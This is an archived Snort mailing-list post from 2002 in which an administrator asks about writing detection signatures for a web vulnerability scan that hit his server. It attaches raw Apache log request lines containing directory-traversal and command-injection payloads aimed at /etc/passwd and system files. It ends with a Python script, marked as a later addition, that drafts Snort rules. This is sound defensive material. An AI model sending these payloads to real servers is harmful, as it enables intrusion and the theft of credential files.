[Snort-sigs] a new whisker-like attack -- sigs?

Jon Hart jhart at ...289...
Sat Mar 2 16:53:08 EST 2002


Good evening,

After heavily scanning our entire network, a dialup account in the US
decided to poke at our webserver.  As the alerts started pouring in, I
immediately thought this was someone playing around with whisker.

Turns out, whisker doesn't provide as many checks as this machine
attempted.  

Out of 209 attacks, 103 were detected by snort.  Of those 103, 22 were
detected because they had /etc/passwd in their request string, not
because they were attempting to exploit another vulnerable web
application/script.

Personally, I don't like those odds.  The good thing is that snort
detected the overall attack and I used the apache logs to further
investigate the incident.  

I'm including the apache logs for anyone who is interested, but my
question is, would it be worthwhile for me to bust out rules for these
attacks that snort missed?  I just realized that I'm not including
web-frontpage.rules in my snort config, but a preliminary check shows
that it doesn't really matter 'cause the attacks still would've passed
undetected anyway.

Thoughts?

-jon

(PS.  If it is worth it, I can turn on web-frontpage.rules and fire
these attacks back at our webserver and see what gets detected this
time, but I suspect that might not be necessary. )

HEAD / HTTP\1.0
HEAD /// HTTP/1.0
HEAD ///server-info HTTP/1.0
HEAD ///server-status HTTP/1.0
HEAD /site/eg/ HTTP/1.0
HEAD /doc/ HTTP/1.0
HEAD /~nobody/ HTTP/1.0
HEAD ///manual/ HTTP/1.0
HEAD /cgi-bin/ HTTP/1.0
HEAD /cgi-bin/ad.cgi HTTP/1.0
HEAD /cgi-bin/aglimpse HTTP/1.0
HEAD /cgi-bin/AnyForm2 HTTP/1.0
HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0
HEAD /cgi-bin/bsguest.cgi HTTP/1.0
HEAD /cgi-bin/bslist.cgi HTTP/1.0
HEAD /cgi-bin/campas HTTP/1.0
HEAD /// HTTP/1.0
HEAD ///carbo.ddl HTTP/1.0
HEAD /cgi-bin/count.cgi HTTP/1.0
HEAD /cgi-bin/cgforum.cgi HTTP/1.0
HEAD /cgi-bin/faxsurvey HTTP/1.0
HEAD /cgi-bin/gbook.cgi HTTP/1.0
HEAD /cgi-bin/htsearch HTTP/1.0
HEAD /cgi-bin/htmlscript HTTP/1.0
HEAD /cgi-bin/jj HTTP/1.0
HEAD /technote/ HTTP/1.0
HEAD /cgi-bin/mmstdod.cgi HTTP/1.0
HEAD /cgi-bin/newdesk HTTP/1.0
HEAD /cgi-bin/register.cgi HTTP/1.0
HEAD /cgi-bin/simplestguest.cgi HTTP/1.0
HEAD /cgi-bin/statusconfig.pl HTTP/1.0
HEAD /cgi-bin/webgais HTTP/1.0
HEAD /iisadmpwd/ HTTP/1.0
HEAD /cgi-bin/webgais HTTP/1.0
HEAD /cgi-bin/perl.exe HTTP/1.0
HEAD /cgi-dos/ HTTP/1.0
HEAD /scripts/ HTTP/1.0
HEAD /cgi-bin/infosrch.cgi HTTP/1.0
HEAD /cgi-bin/rguest.exe HTTP/1.0
HEAD /mall_log_files/ HTTP/1.0
HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0
HEAD /Admin_files/ HTTP/1.0
HEAD /cgi-bin/a1stats/ HTTP/1.0
GET ///quote.html HTTP/1.0
GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0
HEAD /cgi-bin/dcboard.cgi HTTP/1.0
GET /cgi-bin/nph-maillist.pl HTTP/1.0
GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0
GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0
HEAD / HTTP/1.0
HEAD /cgi-bin/ikonboard/ HTTP/1.0
GET http://ms_proxy_auth_query/ HTTP/1.0
HEAD /foldoc/ HTTP/1.0
GET /*.idc HTTP/1.0
HEAD /cgi-bin/adcycle/ HTTP/1.0
GET /iisadmin/ HTTP/1.0
GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0
GET /default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr HTTP/1.0
HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0
GET /msadc/msadcs.dll HTTP/1.0
HEAD /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html  HTTP/1.0
GET /scripts/iisadmin/bdir.htr HTTP/1.0
GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0
GET /iissamples/issamples/query.idq HTTP/1.0
GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0
GET /iissamples/issamples/fastq.idq HTTP/1.0
HEAD /cgi-bin/mailnews.cgi HTTP/1.0
GET /iissamples/exair/search/search.idq HTTP/1.0
HEAD /cgi-bin/newsdesk.cgi HTTP/1.0
GET /iissamples/exair/search/query.idq HTTP/1.0
HEAD /cgi-bin/pals-cgi HTTP/1.0
GET /prxdocs/misc/prxrch.idq HTTP/1.0
HEAD /ROADS/ HTTP/1.0
GET /iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full HTTP/1.0
GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0
GET /iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full HTTP/1.0
HEAD /way-board/ HTTP/1.0
GET /scripts/samples/search/qfullhit.htw HTTP/1.0
GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0
GET /scripts/samples/search/qsumrhit.htw HTTP/1.0
HEAD /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0
GET /abczxv.htw HTTP/1.0
HEAD /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0
GET /scripts/samples/search/author.idq HTTP/1.0
GET /cgi-bin/get32.exe HTTP/1.0
GET /scripts/samples/search/filesize.idq HTTP/1.0
GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0
GET /scripts/samples/search/filetime.idq HTTP/1.0
GET ///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0
GET /scripts/samples/search/query.idq HTTP/1.0
GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0
GET /scripts/samples/search/queryhit.idq HTTP/1.0
GET ///edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 HTTP/1.0
GET /scripts/samples/search/simple.idq HTTP/1.0
GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0
GET /scripts/samples/search/webhits.exe HTTP/1.0
GET /cfcache.map HTTP/1.0
GET /_vti_pvt/administrators.pwd HTTP/1.0
GET /_vti_pvt/authors.pwd HTTP/1.0
GET /_vti_pvt/users.pwd HTTP/1.0
GET /_vti_pvt/service.pwd HTTP/1.0
POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
GET /cgi-bin/ HTTP/1.0
GET /scripts/ HTTP/1.0
GET /cgi-bin/sh HTTP/1.0
GET /cgi-bin/csh HTTP/1.0
GET /cgi-bin/ksh HTTP/1.0
GET /cgi-bin/cmd.exe?/c HTTP/1.0
GET /scripts/cmd.exe?/c HTTP/1.0
GET /cgi-bin/cmd32.exe HTTP/1.0
GET /scripts/cmd32.exe HTTP/1.0
GET /cgi-bin/perl.exe?-v HTTP/1.0
GET /scripts/perl.exe?-v HTTP/1.0
GET /scripts/tools/newdsn.exe HTTP/1.0
GET /_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15 HTTP/1.0
GET /rightfax/fuwww.dll/? HTTP/1.0
GET /iissamples/issamples/query.asp HTTP/1.0
GET /samples/search/queryhit.htm HTTP/1.0
GET /scripts/*%0a.pl HTTP/1.0
GET /iissamples/exair/search/advsearch.asp HTTP/1.0
GET /iisadmpwd/aexp3.htr HTTP/1.0
GET /scripts/repost.asp HTTP/1.0
OPTIONS / HTTP/1.0
OPTIONS /users/ HTTP/1.0
OPTIONS /cgi-bin/ HTTP/1.0
OPTIONS /scripts/ HTTP/1.0
GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0
GET /msadc/samples/selector/showcode.asp HTTP/1.0
GET /?PageServices HTTP/1.0
GET /search? HTTP/1.0
GET /index.html%20 HTTP/1.0
GET /scripts/rguest.exe HTTP/1.0
GET /cgi-bin/rguest.exe HTTP/1.0
GET /scripts/wguest.exe HTTP/1.0
GET /cgi-bin/wguest.exe HTTP/1.0
GET /cgi-bin/get32.exe HTTP/1.0
GET /cgi-bin/alibaba.pl HTTP/1.0
GET /cgi-bin/tst.bat HTTP/1.0
GET /cgi-win/uploader.exe HTTP/1.0
GET /cgi-bin/FormHandler.cgi HTTP/1.0
GET /cgi-bin/testcgi HTTP/1.0
GET /cgi-bin/test-cgi/*?* HTTP/1.0
GET /cgi-bin/test.cgi HTTP/1.0
GET /cgi-bin/enivron.pl HTTP/1.0
GET /scripts/environ.pl HTTP/1.0
GET /server-info HTTP/1.0
GET /server-status HTTP/1.0
GET /cgi-bin/tcsh HTTP/1.0
GET /cgi-bin/cgitest.exe HTTP/1.0
GET /~root HTTP/1.0
GET /~ftp HTTP/1.0
GET /cgi-bin/phf?Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone= HTTP/1.0
GET /cgi-bin/count.cgi HTTP/1.0
GET /cgi-bin/nph-test-cgi HTTP/1.0
GET /cgi-bin/webdist.cgi HTTP/1.0
GET /cgi-bin/aglimpse.cgi HTTP/1.0
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a HTTP/1.0
GET /cgi-bin/jj HTTP/1.0
GET /cgi-bin/formmail HTTP/1.0
GET /cgi-bin/formmail.pl HTTP/1.0
GET /cgi-bin/faxsurvey?/bin/cat%20/etc/passwd HTTP/1.0
GET /cgi-bin/view-source?../../../../../../../etc/passwd HTTP/1.0
GET /scripts/srchadm/webhits.exe HTTP/1.0
GET /scripts/tools/mkilog.exe HTTP/1.0
GET /scripts/tools/mkplog.exe HTTP/1.0
GET /cgi-bin/query?mss=../../../../../../../etc/passwd HTTP/1.0
GET /scripts/htimage.exe?2,2 HTTP/1.0
GET /cgi-bin/htimage.exe?2,2 HTTP/1.0
GET /scripts/samples/search/author.idq HTTP/1.0
GET /scripts/samples/search/filesize.idq HTTP/1.0
GET /scripts/samples/search/filetime.idq HTTP/1.0
GET /scripts/samples/search/query.idq HTTP/1.0
GET /scripts/samples/search/queryhit.idq HTTP/1.0
GET /scripts/samples/search/simple.idq HTTP/1.0
GET /scripts/samples/search/qfullhit.htw HTTP/1.0
GET /scripts/samples/search/qsumrhit.htw HTTP/1.0
GET /scripts/samples/search/webhits.exe HTTP/1.0
GET /robots.txt HTTP/1.0
GET /cgi-bin/echo.bat?&dir+c:\ HTTP/1.0
GET /cgi-bin/hello.bat?&dir+c:\ HTTP/1.0
GET /cgi-bin/htsearch?exclude=%60/etc/passwd%60 HTTP/1.0
GET /cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| HTTP/1.0
GET /cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 HTTP/1.0
GET /names.nsf/?Open HTTP/1.0
GET /catalog.nsf/?Open HTTP/1.0
GET /log.nsf/?Open HTTP/1.0
GET /domlog.nsf/?Open HTTP/1.0
GET /domcfg.nsf/?Open HTTP/1.0
GET /cgi-bin/sojourn.cgi?cat=../../../../../../../etc/passwd HTTP/1.0
GET /ows-bin/perlidlc.bat?&dir HTTP/1.0
GET /cgi-bin/windmail.exe HTTP/1.0
GET /_vti_bin/shtml.dll HTTP/1.0
GET /.htaccess HTTP/1.0
GET /_vti_pvt/doctodep.btr HTTP/1.0
GET /carbo.dll?icatcommand=..\..\..\..\boot.ini&catalogname=catalog HTTP/1.0
GET /cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\boot.ini HTTP/1.0
GET /cfdocs/expeval/openfile.cfm HTTP/1.0
GET /cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' HTTP/1.0
GET /cgi-bin/MachineInfo HTTP/1.0
GET /mylog.phtml?screen=/etc/passwd HTTP/1.0
GET /mlog.phtml?screen=/etc/passwd HTTP/1.0
GET /cgi-bin/wrap HTTP/1.0
GET /ows-bin/oasnetconf.exe?-l%20-s%20CerberusInternetScanner HTTP/1.0
GET /ows-bin/oaskill.exe?abcde.exe HTTP/1.0
GET /cgi-shl/win-c-sample.exe HTTP/1.0
GET /robots.txt HTTP/1.1
GET /tools/ HTTP/1.1
GET /home/ftp HTTP/1.1
GET /home/www HTTP/1.1
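The question in the post is which of the missed probes deserve their own signatures. The script below is an added example for this thread, not code from the original message or from Snort: it parses request lines in the shape of the attached log, normalises the URIs the way an HTTP-aware detector would (percent-decoding, collapsing repeated slashes, cutting at an embedded NUL), separates the requests a generic "/etc/passwd" content match already covers from those that need a path-specific rule, and drafts one uricontent rule per remaining path. The sample request lines are constructed from entries in the attached log; the Snort 2.x rule syntax (flow/uricontent), the WEB-MISC message prefix, the classtype and the local SID range are assumptions to be adjusted to the local ruleset.

```python
"""Triage raw HTTP request lines and draft Snort rules for the probes that
a generic "/etc/passwd" content match would not cover.

Added example for the Snort-sigs thread; not the poster's code and not
part of Snort. Rule syntax assumes Snort 2.x (flow/uricontent); msg text,
classtype and the SID range are placeholders for the local ruleset.
"""
import re
from urllib.parse import unquote

# Constructed sample in the same shape as the attached apache excerpt.
SAMPLE_REQUESTS = """\
HEAD ///server-status HTTP/1.0
HEAD /cgi-bin/ad.cgi HTTP/1.0
GET /cgi-bin/cal_make.pl?p0=../../../../etc/passwd%00 HTTP/1.0
GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../etc/passwd HTTP/1.0
GET /_vti_pvt/service.pwd HTTP/1.0
GET /scripts/cmd.exe?/c HTTP/1.0
GET /cgi-bin/ad.cgi HTTP/1.0
GET ///index.php?chemin=..%2F..%2F..%2Fetc HTTP/1.0
"""

# Tolerates the "HTTP\1.0" typo and the double space seen in the log.
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<uri>\S+)\s+HTTP[/\\]\d\.\d$")

# Generic content checks the post says snort already fires on.
GENERIC_SIGNATURES = ("/etc/passwd",)


def normalize_uri(uri):
    """Drop the query string, percent-decode, cut at an embedded NUL and
    collapse repeated slashes, mirroring an HTTP-aware detector's view."""
    path = unquote(uri.split("?", 1)[0])
    path = path.split("\x00", 1)[0]
    path = re.sub(r"/{2,}", "/", path)
    return path


def parse_requests(text):
    """Yield (method, raw_uri, normalized_path) for each parseable line."""
    for line in text.splitlines():
        m = REQUEST_LINE.match(line.strip())
        if m:
            yield m["method"], m["uri"], normalize_uri(m["uri"])


def triage(text):
    """Return (generic, specific): raw requests a generic signature already
    catches, and a sorted list of unique normalized paths that do not."""
    generic, specific = [], set()
    for _method, raw, path in parse_requests(text):
        decoded = unquote(raw)
        if any(sig in decoded for sig in GENERIC_SIGNATURES):
            generic.append(raw)
        else:
            specific.add(path)
    return generic, sorted(specific)


def draft_rules(paths, first_sid=1000001):
    """Draft one uricontent rule per path. SIDs start in the local range
    (>= 1000000) so they cannot collide with the distributed ruleset."""
    rules = []
    for i, path in enumerate(paths):
        rules.append(
            'alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS '
            f'(msg:"WEB-MISC {path} access"; flow:to_server,established; '
            f'uricontent:"{path}"; nocase; '
            f'classtype:web-application-activity; sid:{first_sid + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    generic, specific = triage(SAMPLE_REQUESTS)
    print(f"{len(generic)} request(s) covered by generic signatures")
    print(f"{len(specific)} distinct path(s) need their own rule:")
    for rule in draft_rules(specific):
        print(rule)
```

Running it over the full attachment instead of the sample (read the file into `triage`) reproduces the split the post describes: the traversal attempts light up on the "/etc/passwd" content alone, while the directory, sample-script and FrontPage probes produce nothing until a path-specific rule exists. Drafted rules are a starting point; each still needs a review for false positives against legitimate paths on the protected servers before it goes into production.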

